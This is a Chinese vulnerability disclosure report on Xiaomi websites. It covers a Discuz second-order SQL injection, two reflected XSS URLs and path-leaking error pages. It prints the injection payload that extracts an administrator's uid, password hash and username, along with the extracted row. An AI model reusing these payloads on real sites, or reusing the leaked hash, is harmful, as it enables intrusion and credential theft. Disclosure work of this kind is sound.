简要描述:
简单通过Google搜索了一下,发现多个大小问题。
详细说明:
1、米聊官方论坛二次注入。
http://www.discuz.net/thread-2354532-1-1.html
打补丁。
2、跨站脚本
http://mi.xiaomi.com/%E6%96%B9%E8%B6%85x%3Cscript%3Ealert%28/ss/%29%3C/script%3E/5
3、跨站脚本
http://mi.xiaomi.com/info.php?i=1&u=%CB%D5%B9%DA%BB%AA%27&e=354111841%40qq.com%27%3Cscript%3Ealert%28/s/%29;%3C/script%3E
4、程序出错暴路径
http://blog.xiaomi.com/wp-content/themes/xiaomi/
5、程序出错暴路径
http://hd.xiaomi.com/index.php?action=rank&date=2011-11-13%27
漏洞证明:
1、x’,`subject`=(/*!select*/ concat(uid,’|’,password,’|’,username) from pre_common_member where groupid=1 limit 0,1),comment=’
4275|fd9d2eba79764c080a3c2f9d5ab7e4a7|麦兜在扫地
2、略
3、略
4、
Fatal error: Call to undefined function get_header() in /data/www/blog.xiaomi.com/wwwroot/wp-content/themes/xiaomi/index.php on line 7
5、
Fatal error: Uncaught exception ‘Exception’ with message ‘DateTime::__construct(): Failed to parse time string (2011-11-13\’) at position 10 (\): Unexpected character’ in /data/www/hd.xiaomi.com/action/rank.action.php:51 Stack trace: #0 /data/www/hd.xiaomi.com/action/rank.action.php(51): DateTime->__construct(‘2011-11-13\”) #1 /data/www/hd.xiaomi.com/action/rank.action.php(40): rank->index() #2 /data/www/hd.xiaomi.com/action/rank.action.php(98): rank->init() #3 /data/www/hd.xiaomi.com/web/index.php(100): require(‘/data/www/hd.xi…’) #4 {main} thrown in /data/www/hd.xiaomi.com/action/rank.action.php on line 51
评论关闭。